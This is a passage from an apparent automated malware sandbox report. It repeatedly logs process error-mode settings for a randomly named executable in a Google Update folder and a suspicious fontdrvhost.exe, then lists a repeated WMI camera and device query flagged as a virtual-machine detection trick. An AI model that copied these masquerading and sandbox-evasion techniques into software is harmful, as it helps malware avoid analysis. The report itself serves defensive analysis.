                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
